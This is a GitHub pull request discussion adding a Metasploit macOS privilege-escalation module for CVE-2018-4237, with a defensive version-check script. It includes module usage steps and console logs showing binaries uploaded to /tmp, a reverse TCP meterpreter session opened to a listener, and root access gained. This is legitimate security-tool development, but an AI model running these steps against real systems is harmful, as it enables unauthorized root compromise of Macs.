Add the macOS LPE from pwn2own2018 (CVE-2018-4237) #10965

Merged
merged 4 commits into from Nov 27, 2018

3 participants
@timwr
timwr commented Nov 15, 2018

This is the LPE part of #10944 in a separate pull request.
I've tested this on 10.13, 10.12.6 and 10.11.
No offsets are required so it should work on all versions (but I don't have anything lower than 10.11 to test on).

Verification

  • Get any OSX session (< 10.13.4)
  • use exploit/osx/local/libxpc_mitm_sudo
  • set SESSION -1
  • set LHOST <tab>
  • set LPORT 4444
  • exploit
  • Verify uid 0
  • Add Documentation
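The verification steps above start from "any OSX session (< 10.13.4)". As an added triage helper for the defender side (not part of this pull request or of Metasploit), the following POSIX sh script decides whether a reported macOS product version falls below that cut-off, so a fleet inventory can be sorted into hosts that still need the update and hosts that do not. It assumes dotted-decimal version strings such as `10.12.6`; the function names `version_lt` and `cve_2018_4237_status` are ours, and `10.13.4` is taken only from the PR's own verification note.

```shell
#!/bin/sh
# Added example, not code from the pull request or from Metasploit.
# Assumption: versions are dotted decimals ("10.12.6"); a missing
# component is treated as 0, so "10.14" compares as "10.14.0".

# version_lt A B: exit 0 (true) when A sorts strictly before B
# in component-wise numeric order, exit 1 otherwise.
version_lt() {
    a="$1"
    b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ai="${a%%.*}"   # leading component of A ("" when exhausted)
        bi="${b%%.*}"   # leading component of B
        [ -z "$ai" ] && ai=0
        [ -z "$bi" ] && bi=0
        if [ "$ai" -lt "$bi" ]; then return 0; fi
        if [ "$ai" -gt "$bi" ]; then return 1; fi
        # drop the component just compared; "" once no dot remains
        case "$a" in *.*) a="${a#*.}" ;; *) a="" ;; esac
        case "$b" in *.*) b="${b#*.}" ;; *) b="" ;; esac
    done
    return 1   # equal versions are not "less than"
}

# cve_2018_4237_status VERSION: prints "affected" when VERSION is
# below the 10.13.4 cut-off named in the PR, "not-affected" otherwise.
# On a macOS host the argument would be "$(sw_vers -productVersion)".
cve_2018_4237_status() {
    if version_lt "$1" "10.13.4"; then
        echo "affected"
    else
        echo "not-affected"
    fi
}

# Stand-alone run over constructed sample versions (not real hosts).
for v in 10.11 10.12.6 10.13.3 10.13.4 10.14; do
    printf '%-8s %s\n' "$v" "$(cve_2018_4237_status "$v")"
done
```

The comparison is done component by component in plain sh rather than with `sort -V`, because `sort -V` is a GNU extension and the script may run on the macOS hosts being inventoried.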

@wchen-r7 wchen-r7 self-assigned this Nov 16, 2018

@timwr
timwr commented Nov 20, 2018

Documentation incoming

@timwr
timwr commented Nov 20, 2018

Oops, I think I broke something:

[*] Started reverse TCP handler on 192.168.3.17:5555
[*] Uploading file: '/tmp/wnrhfxcgak'
[*] Uploading file: '/tmp/zbljxiedwgw'
[*] Executing cmd '/tmp/wnrhfxcgak /tmp/zbljxiedwgw &'
[*] Exploit completed, but no session was created.

I swear this was working when I last pushed :/

@timwr timwr force-pushed the timwr:cve-2018-4237 branch from a4d245c to 0649ad9 Nov 20, 2018

@timwr
timwr commented Nov 20, 2018

Actually, I think I was testing it on python meterpreter. It seems to work better if I move the fork into the binary: 44b1b6f

@timwr timwr removed the needs-docs label Nov 20, 2018

@wchen-r7
wchen-r7 commented Nov 26, 2018

Looking into this :-)

@wchen-r7
wchen-r7 commented Nov 27, 2018

Works flawlessly, nice one @timwr

msf5 exploit(osx/local/libxpc_mitm_ssudo) > show options

Module options (exploit/osx/local/libxpc_mitm_ssudo):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (osx/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.249.1     yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Mac OS X x64 (Native Payload)


msf5 exploit(osx/local/libxpc_mitm_ssudo) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:5555 
[*] Uploading file: '/tmp/muxqqltshhy'
[*] Uploading file: '/tmp/dfgecvg'
[*] Executing cmd '/tmp/muxqqltshhy /tmp/dfgecvg'
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(4088 bytes)
[*] Sending stage (808168 bytes) to 172.16.249.129
[*] Meterpreter session 2 opened (172.16.249.1:5555 -> 172.16.249.129:49172) at 2018-11-27 13:57:29 -0600

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 

@wchen-r7 wchen-r7 merged commit 0649ad9 into rapid7:master Nov 27, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Nov 27, 2018

msjenkins-r7 added a commit that referenced this pull request Nov 27, 2018

@wchen-r7
wchen-r7 commented Nov 27, 2018

Release Notes

The exploits/osx/local/libxpc_mitm_ssudo module has been added to the framework. This is an exploit for CVE-2018-4237, a Mac OS X local privilege escalation vulnerability.
